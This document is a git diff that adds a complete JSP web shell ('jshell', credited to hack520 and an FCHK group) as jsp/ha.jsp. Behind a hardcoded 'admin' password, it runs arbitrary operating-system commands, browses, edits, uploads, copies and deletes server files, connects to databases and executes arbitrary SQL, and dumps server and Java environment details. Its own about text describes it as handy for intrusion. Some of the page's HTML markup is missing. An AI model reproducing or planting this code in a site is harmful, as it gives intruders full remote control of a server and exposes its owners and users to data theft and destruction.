diff --git a/jsp/ha.jsp b/jsp/ha.jsp new file mode 100644 index 0000000..79a9864 --- /dev/null +++ b/jsp/ha.jsp @@ -0,0 +1,1811 @@ +<%@ page contentType="text/html; charset=GBK" %> +<%@ page import="java.io.*"%> +<%@ page import="java.util.Map"%> +<%@ page import="java.util.HashMap"%> +<%@ page import="java.nio.charset.Charset"%> +<%@ page import="java.util.regex.*"%> +<%@ page import="java.sql.*"%> +<%! +private String _password = "admin"; +private String _encodeType = "GB2312"; +private int _sessionOutTime = 20; +private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp", "java", "js", "css", "c", "cpp", "sh", "pl", "cgi", "php", "conf", "xml", "xsl", "ini", "vbs", "inc"}; +private Connection _dbConnection = null; +private Statement _dbStatement = null; +private String _url = null; + +public boolean validate(String password) { +if (password.equals(_password)) { +return true; +} else { +return false; +} +} + +public String HTMLEncode(String str) { +str = str.replaceAll(" ", " "); +str = str.replaceAll("<", "<"); +str = str.replaceAll(">", ">"); +str = str.replaceAll("\r\n", "
"); + +return str; +} + +public String Unicode2GB(String str) { +String sRet = null; + +try { +sRet = new String(str.getBytes("ISO8859_1"), _encodeType); +} catch (Exception e) { +sRet = str; +} + +return sRet; +} + +public String exeCmd(String cmd) { +Runtime runtime = Runtime.getRuntime(); +Process proc = null; +String retStr = ""; +InputStreamReader insReader = null; +char[] tmpBuffer = new char[1024]; +int nRet = 0; + +try { +proc = runtime.exec(cmd); +insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312")); + +while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) { +retStr += new String(tmpBuffer, 0, nRet); +} + +insReader.close(); +retStr = HTMLEncode(retStr); +} catch (Exception e) { +retStr = "bad command \"" + cmd + "\""; +} finally { +return retStr; +} +} + +public String pathConvert(String path) { +String sRet = path.replace('\\', '/'); +File file = new File(path); + +if (file.getParent() != null) { +if (file.isDirectory()) { +if (! sRet.endsWith("/")) +sRet += "/"; +} +} else { +if (! sRet.endsWith("/")) +sRet += "/"; +} + +return sRet; +} + +public String strCut(String str, int len) { +String sRet; + +len -= 3; + +if (str.getBytes().length <= len) { +sRet = str; +} else { +try { +sRet = (new String(str.getBytes(), 0, len, "GBK")) + "..."; +} catch (Exception e) { +sRet = str; +} +} + +return sRet; +} + +public String listFiles(String path, String curUri) { +File[] files = null; +File curFile = null; +String sRet = null; +int n = 0; +boolean isRoot = path.equals(""); + +path = pathConvert(path); + +try { +if (isRoot) { +files = File.listRoots(); +} else { +try { +curFile = new File(path); +String[] sFiles = curFile.list(); +files = new File[sFiles.length]; + +for (n = 0; n < sFiles.length; n ++) { +files[n] = new File(path + sFiles[n]); +} +} catch (Exception e) { +sRet = "bad path \"" + path + "\""; +} +} + +if (sRet == null) { +sRet = "\n"; +sRet += "\n"; +sRet += "\n"; +sRet += " \n"; + +if (curFile != null) { +sRet += " \n"; +sRet += " \n"; +sRet += " \n"; +} + +sRet += "\n"; + +sRet += " \n"; + +for (n = 0; n < files.length; n ++) { +sRet += " \n"; + +if (! isRoot) { +sRet += " \n"; +if (files[n].isDirectory()) { +sRet += " \n"; +} else { +sRet += " \n"; +} + +sRet += " \n"; +sRet += " \n"; +} else { +sRet += " \n"; +} + +sRet += " \n"; +} +sRet += " \n"; +sRet += "
\n"; +sRet += "  上级目录 "; +sRet += "创建目录 "; +sRet += "新建文件 "; +sRet += "删除 "; +sRet += "复制 "; +sRet += "重命名 "; +sRet += "上传文件\n"; +sRet += " \n"; +sRet += "
<" + strCut(files[n].getName(), 50) + ">" + strCut(files[n].getName(), 50) + "" + (files[n].isDirectory() ? "<dir>" : "") + ((! files[n].isDirectory()) && isTextFile(getExtName(files[n].getPath())) ? "<edit>" : "") + "" + files[n].length() + "" + pathConvert(files[n].getPath()) + "
\n"; +} +} catch (SecurityException e) { +sRet = "security violation, no privilege."; +} + +return sRet; +} + +public boolean isTextFile(String extName) { +int i; +boolean bRet = false; + +if (! extName.equals("")) { +for (i = 0; i < _textFileTypes.length; i ++) { +if (extName.equals(_textFileTypes[i])) { +bRet = true; +break; +} +} +} else { +bRet = true; +} + +return bRet; +} + +public String getExtName(String fileName) { +String sRet = ""; +int nLastDotPos; + +fileName = pathConvert(fileName); + +nLastDotPos = fileName.lastIndexOf("."); + +if (nLastDotPos == -1) { +sRet = ""; +} else { +sRet = fileName.substring(nLastDotPos + 1); +} + +return sRet; +} + +public String browseFile(String path) { +String sRet = ""; +File file = null; +FileReader fileReader = null; + +path = pathConvert(path); + +try { +file = new File(path); +fileReader = new FileReader(file); +String fileString = ""; +char[] chBuffer = new char[1024]; +int ret; + +sRet = "\n"; + +} catch (IOException e) { +sRet += "\n"; +} + +return sRet; +} + +public String openFile(String path, String curUri) { +String sRet = ""; +boolean canOpen = false; +int nLastDotPos = path.lastIndexOf("."); +String extName = ""; +String fileString = null; +File curFile = null; + +path = pathConvert(path); + +if (nLastDotPos == -1) { +canOpen = true; +} else { +extName = path.substring(nLastDotPos + 1); +canOpen = isTextFile(extName); +} + +if (canOpen) { +try { +fileString = ""; +curFile = new File(path); +FileReader fileReader = new FileReader(curFile); +char[] chBuffer = new char[1024]; +int nRet; + +while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) { +fileString += new String(chBuffer, 0, nRet); +} + +fileReader.close(); +} catch (IOException e) { +fileString = null; +sRet = "不能打开文件\"" + path + "\""; +} catch (SecurityException e) { +fileString = null; +sRet = "安全问题,没有权限执行该操作"; +} +} else { +sRet = "file \"" + path + "\" is not a text file, can't be opened in text mode"; +} + +if (fileString != null) { +sRet += "\n"; +sRet += "\n"; +sRet += " \n"; +sRet += " \n"; +sRet += " \n"; +sRet += " \n"; +sRet += " \n"; +sRet += " \n"; +sRet += " \n"; +sRet += " \n"; +sRet += " \n"; +sRet += " \n"; +sRet += " \n"; +sRet += "
[上级目录]
\n"; +sRet += " \n"; +sRet += "
 
\n"; +} + +return sRet; +} + +public String saveFile(String path, String curUri, String fileContent) { +String sRet = ""; +File file = null; + +path = pathConvert(path); + +try { +file = new File(path); + +if (! file.canWrite()) { +sRet = "文件不可写"; +} else { +FileWriter fileWriter = new FileWriter(file); +fileWriter.write(fileContent); + +fileWriter.close(); +sRet = "文件保存成功,正在返回,请稍候……\n"; +sRet += "\n"; +} +} catch (IOException e) { +sRet = "保存文件失败"; +} catch (SecurityException e) { +sRet = "安全问题,没有权限执行该操作"; +} + +return sRet; +} + +public String createFolder(String path, String curUri, String folderName) { +String sRet = ""; +File folder = null; + +path = pathConvert(path); + +try { +folder = new File(path + folderName); + +if (folder.exists() && folder.isDirectory()) { +sRet = "\"" + path + folderName + "\"目录已经存在"; +} else { +if (folder.mkdir()) { +sRet = "成功创建目录\"" + pathConvert(folder.getPath()) + "\",正在返回,请稍候……\n"; +sRet += ""; +} else { +sRet = "创建目录\"" + folderName + "\"失败"; +} +} +} catch (SecurityException e) { +sRet = "安全问题,没有权限执行该操作"; +} + +return sRet; +} + +public String createFile(String path, String curUri, String fileName) { +String sRet = ""; +File file = null; + +path = pathConvert(path); + +try { +file = new File(path + fileName); + +if (file.createNewFile()) { +sRet = ""; +} else { +sRet = "\"" + path + fileName + "\"文件已经存在"; +} +} catch (SecurityException e) { +sRet = "安全问题,没有权限执行该操作"; +} catch (IOException e) { +sRet = "创建文件\"" + path + fileName + "\"失败"; +} + +return sRet; +} + +public String deleteFile(String path, String curUri, String[] files2Delete) { +String sRet = ""; +File tmpFile = null; + +try { +for (int i = 0; i < files2Delete.length; i ++) { +tmpFile = new File(files2Delete[i]); +if (! tmpFile.delete()) { +sRet += "删除\"" + files2Delete[i] + "\"失败
\n"; +} +} + +if (sRet.equals("")) { +sRet = "删除成功,正在返回,请稍候……\n"; +sRet += ""; +} +} catch (SecurityException e) { +sRet = "安全问题,没有权限执行该操作\n"; +} + +return sRet; +} + +public String saveAs(String path, String curUri, String fileContent) { +String sRet = ""; +File file = null; +FileWriter fileWriter = null; + +try { +file = new File(path); + +if (file.createNewFile()) { +fileWriter = new FileWriter(file); +fileWriter.write(fileContent); +fileWriter.close(); + +sRet = ""; +} else { +sRet = "文件\"" + path + "\"已经存在"; +} +} catch (IOException e) { +sRet = "创建文件\"" + path + "\"失败"; +} + +return sRet; +} + + +public String uploadFile(ServletRequest request, String path, String curUri) { +String sRet = ""; +File file = null; +InputStream in = null; + +path = pathConvert(path); + +try { +in = request.getInputStream(); + +byte[] inBytes = new byte[request.getContentLength()]; +int nBytes; +int start = 0; +int end = 0; +int size = 1024; +String token = null; +String filePath = null; + +// +// 把输入流读入一个字节数组 +// +while ((nBytes = in.read(inBytes, start, size)) != -1) { +start += nBytes; +} + +in.close(); +// +// 从字节数组中得到文件分隔符号 +// +int i = 0; +byte[] seperator; + +while (inBytes[i] != 13) { +i ++; +} + +seperator = new byte[i]; + +for (i = 0; i < seperator.length; i ++) { +seperator[i] = inBytes[i]; +} + +// +// 得到Header部分 +// +String dataHeader = null; +i += 3; +start = i; +while (! (inBytes[i] == 13 && inBytes[i + 2] == 13)) { +i ++; +} +end = i - 1; +dataHeader = new String(inBytes, start, end - start + 1); + +// +// 得到文件名 +// +token = "filename=\""; +start = dataHeader.indexOf(token) + token.length(); +token = "\""; +end = dataHeader.indexOf(token, start) - 1; +filePath = dataHeader.substring(start, end + 1); +filePath = pathConvert(filePath); +String fileName = filePath.substring(filePath.lastIndexOf("/") + 1); + +// +// 得到文件内容开始位置 +// +i += 4; +start = i; + +/* +boolean found = true; +byte[] tmp = new byte[seperator.length]; +while (i <= inBytes.length - 1 - seperator.length) { + +for (int j = i; j < i + seperator.length; j ++) { +if (seperator[j - i] != inBytes[j]) { +found = false; +break; +} else +tmp[j - i] = inBytes[j]; +} + +if (found) +break; + +i ++; +}*/ + +// +// 偷懒的办法 +// +end = inBytes.length - 1 - 2 - seperator.length - 2 - 2; + +// +// 保存为文件 +// +File newFile = new File(path + fileName); +newFile.createNewFile(); +FileOutputStream out = new FileOutputStream(newFile); + +//out.write(inBytes, start, end - start + 1); +out.write(inBytes, start, end - start + 1); +out.close(); + +sRet = "\n"; +} catch (IOException e) { +sRet = "\n"; +} + +sRet += ""; +return sRet; +} + +public boolean fileCopy(String srcPath, String dstPath) { +boolean bRet = true; + +try { +FileInputStream in = new FileInputStream(new File(srcPath)); +FileOutputStream out = new FileOutputStream(new File(dstPath)); +byte[] buffer = new byte[1024]; +int nBytes; + + +while ((nBytes = in.read(buffer, 0, 1024)) != -1) { +out.write(buffer, 0, nBytes); +} + +in.close(); +out.close(); +} catch (IOException e) { +bRet = false; +} + +return bRet; +} + +public String getFileNameByPath(String path) { +String sRet = ""; + +path = pathConvert(path); + +if (path.lastIndexOf("/") != -1) { +sRet = path.substring(path.lastIndexOf("/") + 1); +} else { +sRet = path; +} + +return sRet; +} + +public String copyFiles(String path, String curUri, String[] files2Copy, String dstPath) { +String sRet = ""; +int i; + +path = pathConvert(path); +dstPath = pathConvert(dstPath); + +for (i = 0; i < files2Copy.length; i ++) { +if (! fileCopy(files2Copy[i], dstPath + getFileNameByPath(files2Copy[i]))) { +sRet += "文件\"" + files2Copy[i] + "\"复制失败
"; +} +} + +if (sRet.equals("")) { +sRet = "文件复制成功,正在返回,请稍候……"; +sRet += ""; +} + +return sRet; +} + +public boolean isFileName(String fileName) { +boolean bRet = false; + +Pattern p = Pattern.compile("^[a-zA-Z0-9][\\w\\.]*[\\w]$"); +Matcher m = p.matcher(fileName); + +bRet = m.matches(); + +return bRet; +} + +public String renameFile(String path, String curUri, String file2Rename, String newName) { +String sRet = ""; + +path = pathConvert(path); +file2Rename = pathConvert(file2Rename); + +try { +File file = new File(file2Rename); + +newName = file2Rename.substring(0, file2Rename.lastIndexOf("/") + 1) + newName; +File newFile = new File(newName); + +if (! file.exists()) { +sRet = "文件\"" + file2Rename + "\"不存在"; +} else { +file.renameTo(newFile); +sRet = "文件重命名成功,正在返回,请稍候……"; +sRet += ""; +} +} catch (SecurityException e) { +sRet = "安全问题导致文件\"" + file2Rename + "\"复制失败"; +} + +return sRet; +} + +public boolean DBInit(String dbType, String dbServer, String dbPort, String dbUsername, String dbPassword, String dbName) { +boolean bRet = true; +String driverName = ""; + +if (dbServer.equals("")) +dbServer = "localhost"; + +try { +if (dbType.equals("sqlserver")) { +driverName = "com.microsoft.jdbc.sqlserver.SQLServerDriver"; +if (dbPort.equals("")) +dbPort = "1433"; +_url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; +} else if (dbType.equals("mysql")) { +driverName = "com.mysql.jdbc.Driver"; +if (dbPort.equals("")) +dbPort = "3306"; +_url = "jdbc:mysql://" + dbServer + ":" + dbPort + ";User=" + dbUsername + ";Password=" + dbPassword + ";DatabaseName=" + dbName; +} else if (dbType.equals("odbc")) { +driverName = "sun.jdbc.odbc.JdbcOdbcDriver"; +_url = "jdbc:odbc:dsn=" + dbName + ";User=" + dbUsername + ";Password=" + dbPassword; +} else if (dbType.equals("oracle")) { +driverName = "oracle.jdbc.driver.OracleDriver"; +_url = "jdbc:oracle:thin@" + dbServer + ":" + dbPort + ":" + dbName; +} else if (dbType.equals("db2")) { +driverName = "com.ibm.db2.jdbc.app.DB2Driver"; +_url = "jdbc:db2://" + dbServer + ":" + dbPort + "/" + dbName; +} + +Class.forName(driverName); +} catch (ClassNotFoundException e) { +bRet = false; +} + +return bRet; +} + +public boolean DBConnect(String User, String Password) { +boolean bRet = false; + +if (_url != null) { +try { +_dbConnection = DriverManager.getConnection(_url, User, Password); +_dbStatement = _dbConnection.createStatement(); +bRet = true; +} catch (SQLException e) { +bRet = false; +} +} + +return bRet; +} + +public String DBExecute(String sql) { +String sRet = ""; + +if (_dbConnection == null || _dbStatement == null) { +sRet = "数据库没有正常连接"; +} else { +try { +if (sql.toLowerCase().substring(0, 6).equals("select")) { +ResultSet rs = _dbStatement.executeQuery(sql); +ResultSetMetaData rsmd = rs.getMetaData(); +int colNum = rsmd.getColumnCount(); +int colType; + +sRet = "sql语句执行成功,返回结果
\n"; +sRet += "\n"; +sRet += " \n"; +for (int i = 1; i <= colNum; i ++) { +sRet += " \n"; +} +sRet += " \n"; +while (rs.next()) { +sRet += " \n"; +for (int i = 1; i <= colNum; i ++) { +colType = rsmd.getColumnType(i); + +sRet += " \n"; +} +sRet += " \n"; +} +sRet += "
" + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ")
"; +switch (colType) { +case Types.BIGINT: +sRet += rs.getLong(i); +break; + +case Types.BIT: +sRet += rs.getBoolean(i); +break; + +case Types.BOOLEAN: +sRet += rs.getBoolean(i); +break; + +case Types.CHAR: +sRet += rs.getString(i); +break; + +case Types.DATE: +sRet += rs.getDate(i).toString(); +break; + +case Types.DECIMAL: +sRet += rs.getDouble(i); +break; + +case Types.NUMERIC: +sRet += rs.getDouble(i); +break; + +case Types.REAL: +sRet += rs.getDouble(i); +break; + +case Types.DOUBLE: +sRet += rs.getDouble(i); +break; + +case Types.FLOAT: +sRet += rs.getFloat(i); +break; + +case Types.INTEGER: +sRet += rs.getInt(i); +break; + +case Types.TINYINT: +sRet += rs.getShort(i); +break; + +case Types.VARCHAR: +sRet += rs.getString(i); +break; + +case Types.TIME: +sRet += rs.getTime(i).toString(); +break; + +case Types.DATALINK: +sRet += rs.getTimestamp(i).toString(); +break; +} +sRet += "
\n"; + +rs.close(); +} else { +if (_dbStatement.execute(sql)) { +sRet = "sql语句执行成功"; +} else { +sRet = "sql语句执行失败"; +} +} +} catch (SQLException e) { +sRet = "sql语句执行失败"; +} +} + +return sRet; +} + +public void DBRelease() { +try { +if (_dbStatement != null) { +_dbStatement.close(); +_dbStatement = null; +} + +if (_dbConnection != null) { +_dbConnection.close(); +_dbConnection = null; +} +} catch (SQLException e) { + +} +} + +///////////////////////////////////////////////////////////////////////////////////////////////////////////////// + +class JshellConfig { +private String _jshellContent = null; +private String _path = null; + +public JshellConfig(String path) throws JshellConfigException { +_path = path; +read(); +} + +private void read() throws JshellConfigException { +try { +FileReader jshell = new FileReader(new File(_path)); +char[] buffer = new char[1024]; +int nChars; +_jshellContent = ""; + +while ((nChars = jshell.read(buffer, 0, 1024)) != -1) { +_jshellContent += new String(buffer, 0, nChars); +} + +jshell.close(); +} catch (IOException e) { +throw new JshellConfigException("打开文件失败"); +} +} + +public void save() throws JshellConfigException { +FileWriter jshell = null; + +try { +jshell = new FileWriter(new File(_path)); +char[] buffer = _jshellContent.toCharArray(); +int start = 0; +int size = 1024; + +for (start = 0; start < buffer.length - 1 - size; start += size) { +jshell.write(buffer, start, size); +} + +jshell.write(buffer, start, buffer.length - 1 - start); +} catch (IOException e) { +new JshellConfigException("写文件失败"); +} finally { +try { +jshell.close(); +} catch (IOException e) { + +} +} +} + +public void setPassword(String password) throws JshellConfigException { +Pattern p = Pattern.compile("\\w+"); +Matcher m = p.matcher(password); + +if (! m.matches()) { +throw new JshellConfigException("密码不能有除字母数字下划线以外的字符"); +} + +p = Pattern.compile("private\\sString\\s_password\\s=\\s\"" + _password + "\""); +m = p.matcher(_jshellContent); +if (! m.find()) { +throw new JshellConfigException("程序体已经被非法修改"); +} + +_jshellContent = m.replaceAll("private String _password = \"" + password + "\""); + +//return HTMLEncode(_jshellContent); +} + +public void setEncodeType(String encodeType) throws JshellConfigException { +Pattern p = Pattern.compile("[A-Za-z0-9]+"); +Matcher m = p.matcher(encodeType); + +if (! m.matches()) { +throw new JshellConfigException("编码格式只能是字母和数字的组合"); +} + +p = Pattern.compile("private\\sString\\s_encodeType\\s=\\s\"" + _encodeType + "\""); +m = p.matcher(_jshellContent); + +if (! m.find()) { +throw new JshellConfigException("程序体已经被非法修改"); +} + +_jshellContent = m.replaceAll("private String _encodeType = \"" + encodeType + "\""); +//return HTMLEncode(_jshellContent); +} + +public void setSessionTime(String sessionTime) throws JshellConfigException { +Pattern p = Pattern.compile("\\d+"); +Matcher m = p.matcher(sessionTime); + +if (! m.matches()) { +throw new JshellConfigException("session超时时间只能填数字"); +} + +p = Pattern.compile("private\\sint\\s_sessionOutTime\\s=\\s" + _sessionOutTime); +m = p.matcher(_jshellContent); + +if (! m.find()) { +throw new JshellConfigException("程序体已经被非法修改"); +} + +_jshellContent = m.replaceAll("private int _sessionOutTime = " + sessionTime); +//return HTMLEncode(_jshellContent); +} + +public void setTextFileTypes(String[] textFileTypes) throws JshellConfigException { +Pattern p = Pattern.compile("\\w+"); +Matcher m = null; +int i; +String fileTypes = ""; +String tmpFileTypes = ""; + +for (i = 0; i < textFileTypes.length; i ++) { +m = p.matcher(textFileTypes[i]); + +if (! m.matches()) { +throw new JshellConfigException("扩展名只能是字母数字和下划线的组合"); +} + +if (i != textFileTypes.length - 1) +fileTypes += "\"" + textFileTypes[i] + "\"" + ", "; +else +fileTypes += "\"" + textFileTypes[i] + "\""; +} + +for (i = 0; i < _textFileTypes.length; i ++) { +if (i != _textFileTypes.length - 1) +tmpFileTypes += "\"" + _textFileTypes[i] + "\"" + ", "; +else +tmpFileTypes += "\"" + _textFileTypes[i] + "\""; +} + +p = Pattern.compile(tmpFileTypes); +m = p.matcher(_jshellContent); + +if (! m.find()) { +throw new JshellConfigException("程序文件已经被非法修改"); +} + +_jshellContent = m.replaceAll(fileTypes); + +//return HTMLEncode(_jshellContent); +} + +public String getContent() { +return HTMLEncode(_jshellContent); +} +} + +class JshellConfigException extends Exception { +public JshellConfigException(String message) { +super(message); +} +} +%> + + +[FC※HK]小组专用 + + + + +<% +session.setMaxInactiveInterval(_sessionOutTime * 60); + +if (request.getParameter("password") == null && session.getAttribute("password") == null) { +// show the login form +//================================================================================================ +%> +
+ + + + +
+ + + + + + + + + + + + + + + +
 8管理登录 :::...JFolder_By_hack520
+ + +
+
+<% +//================================================================================================ +// end of the login form +} else { +String password = null; + +if (session.getAttribute("password") == null) { +password = (String)request.getParameter("password"); + +if (validate(password) == false) { +out.println("
  • 哎呀,倒霉死啦!
    • "); +out.close(); +return; +} + +session.setAttribute("password", password); +} else { +password = (String)session.getAttribute("password"); +} + +String action = null; + + +if (request.getParameter("action") == null) +action = "main"; +else +action = (String)request.getParameter("action"); + +if (action.equals("exit")) { +session.removeAttribute("password"); +response.sendRedirect(request.getRequestURI()); +out.close(); +return; +} + +// show the main menu +//==================================================================================== +%> + + + + + + + +
    + + +
    +<% +//===================================================================================== +// end of main menu + +if (action.equals("main")) { +// print the system info table +//======================================================================================= +%> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    服务器信息
    服务器名<%=request.getServerName()%>
    服务器端口<%=request.getServerPort()%>
    操作系统<%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " " + System.getProperty("os.arch")%>
    当前用户名<%=System.getProperty("user.name")%>
    当前用户目录<%=System.getProperty("user.home")%>
    当前用户工作目录<%=System.getProperty("user.dir")%>
    程序相对路径<%=request.getRequestURI()%>
    程序绝对路径<%=request.getRealPath(request.getServletPath())%>
    网络协议<%=request.getProtocol()%>
    服务器软件版本信息<%=application.getServerInfo()%>
    JDK版本<%=System.getProperty("java.version")%>
    JDK安装路径<%=System.getProperty("java.home")%>
    JAVA虚拟机版本<%=System.getProperty("java.vm.specification.version")%>
    JAVA虚拟机名<%=System.getProperty("java.vm.name")%>
    JAVA类路径<%=System.getProperty("java.class.path")%>
    JAVA载入库搜索路径<%=System.getProperty("java.library.path")%>
    JAVA临时目录<%=System.getProperty("java.io.tmpdir")%>
    JIT编译器名<%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%>
    扩展目录路径<%=System.getProperty("java.ext.dirs")%>
    客户端信息
    客户机地址<%=request.getRemoteAddr()%>
    服务机器名<%=request.getRemoteHost()%>
    用户名<%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%>
    请求方式<%=request.getScheme()%>
    应用安全套接字层<%=request.isSecure() == true ? "是" : "否"%>
    +<% +//======================================================================================= +// end of printing the system info table +///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +} else if (action.equals("filesystem")) { +String curPath = ""; +String result = ""; +String fsAction = ""; + +if (request.getParameter("curPath") == null) { +curPath = request.getRealPath(request.getServletPath()); +curPath = pathConvert((new File(curPath)).getParent()); +} else { +curPath = Unicode2GB((String)request.getParameter("curPath")); +} + +if (request.getParameter("fsAction") == null) { +fsAction = "list"; +} else { +fsAction = (String)request.getParameter("fsAction"); +} + +if (fsAction.equals("list")) +result = listFiles(curPath, request.getRequestURI() + "?action=" + action); +else if (fsAction.equals("browse")) { +result = listFiles(new File(curPath).getParent(), request.getRequestURI() + "?action=" + action); +result += browseFile(curPath); +} +else if (fsAction.equals("open")) +result = openFile(curPath, request.getRequestURI() + "?action=" + action); +else if (fsAction.equals("save")) { +if (request.getParameter("fileContent") == null) { +result = "页面导航错误"; +} else { +String fileContent = Unicode2GB((String)request.getParameter("fileContent")); +result = saveFile(curPath, request.getRequestURI() + "?action=" + action, fileContent); +} +} else if (fsAction.equals("createFolder")) { +if (request.getParameter("folderName") == null) { +result = "目录名不能为空"; +} else { +String folderName = Unicode2GB(request.getParameter("folderName").trim()); +if (folderName.equals("")) { +result = "目录名不能为空"; +} else { +result = createFolder(curPath, request.getRequestURI() + "?action=" + action, folderName); +} +} +} else if (fsAction.equals("createFile")) { +if (request.getParameter("fileName") == null) { +result = "文件名不能为空"; +} else { +String fileName = Unicode2GB(request.getParameter("fileName").trim()); +if (fileName.equals("")) { +result = "文件名不能为空"; +} else { +result = createFile(curPath, request.getRequestURI() + "?action=" + action, fileName); +} +} +} else if (fsAction.equals("deleteFile")) { +if (request.getParameter("filesDelete") == null) { +result = "没有选择要删除的文件"; +} else { +String[] files2Delete = (String[])request.getParameterValues("filesDelete"); +if (files2Delete.length == 0) { +result = "没有选择要删除的文件"; +} else { +for (int n = 0; n < files2Delete.length; n ++) { +files2Delete[n] = Unicode2GB(files2Delete[n]); +} +result = deleteFile(curPath, request.getRequestURI() + "?action=" + action, files2Delete); +} +} +} else if (fsAction.equals("saveAs")) { +if (request.getParameter("fileContent") == null) { +result = "页面导航错误"; +} else { +String fileContent = Unicode2GB(request.getParameter("fileContent")); +result = saveAs(curPath, request.getRequestURI() + "?action=" + action, fileContent); +} +} else if (fsAction.equals("upload")) { +result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action); +} else if (fsAction.equals("copyto")) { +if (request.getParameter("filesDelete") == null || request.getParameter("dstPath") == null) { +result = "没有选择要复制的文件"; +} else { +String[] files2Copy = request.getParameterValues("filesDelete"); +String dstPath = request.getParameter("dstPath").trim(); +if (files2Copy.length == 0) { +result = "没有选择要复制的文件"; +} else if (dstPath.equals("")) { +result = "没有填写要复制到的目录路径"; +} else { +for (int i = 0; i < files2Copy.length; i ++) +files2Copy[i] = Unicode2GB(files2Copy[i]); + +result = copyFiles(curPath, request.getRequestURI() + "?action=" + action, files2Copy, Unicode2GB(dstPath)); +} +} +} else if (fsAction.equals("rename")) { +if (request.getParameter("fileRename") == null) { +result = "页面导航错误"; +} else { +String file2Rename = request.getParameter("fileRename").trim(); +String newName = request.getParameter("newName").trim(); +if (file2Rename.equals("")) { +result = "没有选择要重命名的文件"; +} else if (newName.equals("")) { +result = "没有填写新文件名"; +} else { +result = renameFile(curPath, request.getRequestURI() + "?action=" + action, Unicode2GB(file2Rename), Unicode2GB(newName)); +} +} +} +%> + + + + + + + + + +
    地址   +
    <%= result.trim().equals("")?" " : result%>
    +<% +///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +} else if (action.equals("command")) { +String cmd = ""; +InputStream ins = null; +String result = ""; + +if (request.getParameter("command") != null) { +cmd = (String)request.getParameter("command"); +result = exeCmd(cmd); +} +// print the command form +//======================================================================================== +%> + + + + + + + + + + + + +
    执行命令
    + + +
    执行结果
    + + + + +
    <%=result == "" ? " " : result%>
    +<% +//========================================================================================= +// end of printing command form +/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +} else if (action.equals("database")) { +String dbAction = ""; +String result = ""; +String dbType = ""; +String dbServer = ""; +String dbPort = ""; +String dbUsername = ""; +String dbPassword = ""; +String dbName = ""; +String dbResult = ""; +String sql = ""; + +if (request.getParameter("dbAction") == null) { +dbAction = "main"; +} else { +dbAction = request.getParameter("dbAction").trim(); +if (dbAction.equals("")) +dbAction = "main"; +} + +if (dbAction.equals("main")) { +result = " "; +} else if (dbAction.equals("dbConnect")) { +if (request.getParameter("dbType") == null || +request.getParameter("dbServer") == null || +request.getParameter("dbPort") == null || +request.getParameter("dbUsername") == null || +request.getParameter("dbPassword") == null || +request.getParameter("dbName") == null) { +response.sendRedirect(request.getRequestURI() + "?action=" + action); +} else { +dbType = request.getParameter("dbType").trim(); +dbServer = request.getParameter("dbServer").trim(); +dbPort = request.getParameter("dbPort").trim(); +dbUsername = request.getParameter("dbUsername").trim(); +dbPassword = request.getParameter("dbPassword").trim(); +dbName = request.getParameter("dbName").trim(); + +if (DBInit(dbType, dbServer, dbPort, dbUsername, dbPassword, dbName)) { +if (DBConnect(dbUsername, dbPassword)) { +if (request.getParameter("sql") != null) { +sql = request.getParameter("sql").trim(); +if (! sql.equals("")) { +dbResult = DBExecute(sql); +} +} + +result = "\n"; +result += "sql语句

     \n"; + +DBRelease(); +} else { +result = "数据库连接失败"; +} +} else { +result = "数据库连接驱动没有找到"; +} +} +} +%> + + +"> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    数据库连接类型 + + +
    数据库服务器地址
    数据库服务器端口
    数据库用户名
    数据库密码
    数据库名
     
    <%=result%>
    + + + + +
    +<%=dbResult%> +
    +<% + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +} else if (action.equals("config")) { +String cfAction = ""; +int i; + +if (request.getParameter("cfAction") == null) { + +cfAction = "main"; +} else { +cfAction = request.getParameter("cfAction").trim(); +if (cfAction.equals("")) +cfAction = "main"; +} + +if (cfAction.equals("main")) { +// start of config form +//========================================================================================== +%> + + +" onSubmit="javascript:selectAllTypes()"> + + + + + + + + + + + + + + + + + + + + +
    密码
    系统编码
    Session超时时间
    可编辑文件类型 + + + + + + +
    + + + +

    + +    		 + +
    +
    +<% +} else if (cfAction.equals("save")) { +if (request.getParameter("password") == null || +request.getParameter("encode") == null || +request.getParameter("sessionTime") == null || +request.getParameterValues("textFileTypes") == null) { +response.sendRedirect(request.getRequestURI()); +} + +String result = ""; + +String newPassword = request.getParameter("password").trim(); +String newEncodeType = request.getParameter("encode").trim(); +String newSessionTime = request.getParameter("sessionTime").trim(); +String[] newTextFileTypes = request.getParameterValues("textFileTypes"); +String jshellPath = request.getRealPath(request.getServletPath()); + +try { +JshellConfig jconfig = new JshellConfig(jshellPath); +jconfig.setPassword(newPassword); +jconfig.setEncodeType(newEncodeType); +jconfig.setSessionTime(newSessionTime); +jconfig.setTextFileTypes(newTextFileTypes); +jconfig.save(); +result += "设置保存成功,正在返回,请稍候……"; +result += ""; +} catch (JshellConfigException e) { +result = "" + e.getMessage() + ""; +} + +%> + + + + +
    <%=result == "" ? " " : result%>
    +<% +} +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +//========================================================================================== +// end of config form +} else if (action.equals("about")) { +// start of about +//========================================================================================== +%> + + + + + + + + + + +
    关于 jshell ver 0.1
        增加了显示alxea排名的功能,这对于入侵中也比较方便些,版权还是归作者的.
    hack520 by hack520 and welcome to FCHK
    +<% +//========================================================================================== +} +} +%> + +